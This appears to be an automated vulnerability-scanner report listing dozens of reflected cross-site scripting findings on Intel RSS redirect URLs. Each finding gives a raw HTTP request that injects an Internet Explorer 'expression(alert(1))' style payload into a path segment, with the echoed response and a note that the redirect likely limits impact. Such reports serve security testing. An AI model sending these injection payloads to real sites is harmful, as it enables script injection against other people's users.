GET /click/~rss-182178-c1-264172/newsroom.intel.com/community37f9d"style%3d"x%3aexpression(alert(1))"5528cd11f2e/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community37f9d"style="x:expression(alert(1))"5528cd11f2e/intel_newsroom/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c273f"style%3d"x%3aexpression(alert(1))"5a8a63b8829 was submitted in the REST URL parameter 5. This input was echoed as c273f"style="x:expression(alert(1))"5a8a63b8829 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroomc273f"style%3d"x%3aexpression(alert(1))"5a8a63b8829/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomc273f"style="x:expression(alert(1))"5a8a63b8829/blog/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 975bc"style%3d"x%3aexpression(alert(1))"2eca44a5c06 was submitted in the REST URL parameter 6. This input was echoed as 975bc"style="x:expression(alert(1))"2eca44a5c06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog975bc"style%3d"x%3aexpression(alert(1))"2eca44a5c06/2011/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog975bc"style="x:expression(alert(1))"2eca44a5c06/2011/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d4d"style%3d"x%3aexpression(alert(1))"ddfc2782d6d was submitted in the REST URL parameter 7. This input was echoed as 45d4d"style="x:expression(alert(1))"ddfc2782d6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/201145d4d"style%3d"x%3aexpression(alert(1))"ddfc2782d6d/02/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/201145d4d"style="x:expression(alert(1))"ddfc2782d6d/02/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d4a"style%3d"x%3aexpression(alert(1))"41c87971c29 was submitted in the REST URL parameter 8. This input was echoed as 68d4a"style="x:expression(alert(1))"41c87971c29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/0268d4a"style%3d"x%3aexpression(alert(1))"41c87971c29/01/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/0268d4a"style="x:expression(alert(1))"41c87971c29/01/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb50"style%3d"x%3aexpression(alert(1))"8f86c2e6e9d was submitted in the REST URL parameter 9. This input was echoed as deb50"style="x:expression(alert(1))"8f86c2e6e9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-182178-c1-264172/newsroom.intel.com/community/intel_newsroom/blog/2011/02/01deb50"style%3d"x%3aexpression(alert(1))"8f86c2e6e9d/chip-shot-intel-renewable-energy-powers-up HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01deb50"style="x:expression(alert(1))"8f86c2e6e9d/chip-shot-intel-renewable-energy-powers-up?cid=rss-182178-c1-264172"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8990d"style%3d"x%3aexpression(alert(1))"6a4a1f59ddf was submitted in the REST URL parameter 10. This input was echoed as 8990d"style="x:expression(alert(1))"6a4a1f59ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign8990d"style%3d"x%3aexpression(alert(1))"6a4a1f59ddf HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign8990d"style="x:expression(alert(1))"6a4a1f59ddf?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c13a"style%3d"x%3aexpression(alert(1))"dbd34b499c2 was submitted in the REST URL parameter 2. This input was echoed as 3c13a"style="x:expression(alert(1))"dbd34b499c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-2640903c13a"style%3d"x%3aexpression(alert(1))"dbd34b499c2/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-2640903c13a"style="x:expression(alert(1))"dbd34b499c2"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 542f9"style%3d"x%3aexpression(alert(1))"6ae2d48504d was submitted in the REST URL parameter 3. This input was echoed as 542f9"style="x:expression(alert(1))"6ae2d48504d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com542f9"style%3d"x%3aexpression(alert(1))"6ae2d48504d/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com542f9"style="x:expression(alert(1))"6ae2d48504d/community/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b87"style%3d"x%3aexpression(alert(1))"1cf80933b02 was submitted in the REST URL parameter 4. This input was echoed as 18b87"style="x:expression(alert(1))"1cf80933b02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community18b87"style%3d"x%3aexpression(alert(1))"1cf80933b02/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1 Host: rss.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The URL has moved <a href="http://newsroom.intel.com/community18b87"style="x:expression(alert(1))"1cf80933b02/intel_newsroom/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da64d"style%3d"x%3aexpression(alert(1))"dba1dcf6eaa was submitted in the REST URL parameter 5. This input was echoed as da64d"style="x:expression(alert(1))"dba1dcf6eaa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroomda64d"style%3d"x%3aexpression(alert(1))"dba1dcf6eaa/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomda64d"style="x:expression(alert(1))"dba1dcf6eaa/blog/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5de8"style%3d"x%3aexpression(alert(1))"b9a36043a42 was submitted in the REST URL parameter 6. This input was echoed as c5de8"style="x:expression(alert(1))"b9a36043a42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blogc5de8"style%3d"x%3aexpression(alert(1))"b9a36043a42/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blogc5de8"style="x:expression(alert(1))"b9a36043a42/2011/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210fc"style%3d"x%3aexpression(alert(1))"72bb478d645 was submitted in the REST URL parameter 7. This input was echoed as 210fc"style="x:expression(alert(1))"72bb478d645 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011210fc"style%3d"x%3aexpression(alert(1))"72bb478d645/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011210fc"style="x:expression(alert(1))"72bb478d645/01/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ca69"style%3d"x%3aexpression(alert(1))"d3ef2b7acf6 was submitted in the REST URL parameter 8. This input was echoed as 1ca69"style="x:expression(alert(1))"d3ef2b7acf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/011ca69"style%3d"x%3aexpression(alert(1))"d3ef2b7acf6/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/011ca69"style="x:expression(alert(1))"d3ef2b7acf6/31/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56bbf"style%3d"x%3aexpression(alert(1))"8390e8a9d78 was submitted in the REST URL parameter 9. This input was echoed as 56bbf"style="x:expression(alert(1))"8390e8a9d78 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264090/newsroom.intel.com/community/intel_newsroom/blog/2011/01/3156bbf"style%3d"x%3aexpression(alert(1))"8390e8a9d78/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/3156bbf"style="x:expression(alert(1))"8390e8a9d78/intel-capital-commits-200-million-as-part-of-president-obamas-startup-america-campaign?cid=rss-258152-c1-264090"> ...[SNIP]...
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd2dc"style%3d"x%3aexpression(alert(1))"a09a84ec8e8 was submitted in the REST URL parameter 10. This input was echoed as dd2dc"style="x:expression(alert(1))"a09a84ec8e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-businessdd2dc"style%3d"x%3aexpression(alert(1))"a09a84ec8e8 HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-businessdd2dc"style="x:expression(alert(1))"a09a84ec8e8?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d82"style%3d"x%3aexpression(alert(1))"a47bdb4daac was submitted in the REST URL parameter 2. This input was echoed as c3d82"style="x:expression(alert(1))"a47bdb4daac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093c3d82"style%3d"x%3aexpression(alert(1))"a47bdb4daac/newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093c3d82"style="x:expression(alert(1))"a47bdb4daac"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf234"style%3d"x%3aexpression(alert(1))"80af0cefb29 was submitted in the REST URL parameter 3. This input was echoed as bf234"style="x:expression(alert(1))"80af0cefb29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.combf234"style%3d"x%3aexpression(alert(1))"80af0cefb29/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.combf234"style="x:expression(alert(1))"80af0cefb29/community/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee58f"style%3d"x%3aexpression(alert(1))"9a29b5a08b9 was submitted in the REST URL parameter 4. This input was echoed as ee58f"style="x:expression(alert(1))"9a29b5a08b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/communityee58f"style%3d"x%3aexpression(alert(1))"9a29b5a08b9/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/communityee58f"style="x:expression(alert(1))"9a29b5a08b9/intel_newsroom/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc484"style%3d"x%3aexpression(alert(1))"f99e89de0d0 was submitted in the REST URL parameter 5. This input was echoed as dc484"style="x:expression(alert(1))"f99e89de0d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroomdc484"style%3d"x%3aexpression(alert(1))"f99e89de0d0/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroomdc484"style="x:expression(alert(1))"f99e89de0d0/blog/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2734c"style%3d"x%3aexpression(alert(1))"dfc1ad19df5 was submitted in the REST URL parameter 6. This input was echoed as 2734c"style="x:expression(alert(1))"dfc1ad19df5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog2734c"style%3d"x%3aexpression(alert(1))"dfc1ad19df5/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog2734c"style="x:expression(alert(1))"dfc1ad19df5/2011/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 858f3"style%3d"x%3aexpression(alert(1))"f39a96aae49 was submitted in the REST URL parameter 7. This input was echoed as 858f3"style="x:expression(alert(1))"f39a96aae49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /click/~rss-258152-c1-264093/newsroom.intel.com/community/intel_newsroom/blog/2011858f3"style%3d"x%3aexpression(alert(1))"f39a96aae49/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business HTTP/1.1
Host: rss.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011858f3"style="x:expression(alert(1))"f39a96aae49/01/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093"> ...[SNIP]...
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76c51"style%3d"x%3aexpression(alert(1))"f5ad9d5bc7f was submitted in the REST URL parameter 8. This input was echoed as 76c51"style="x:expression(alert(1))"f5ad9d5bc7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
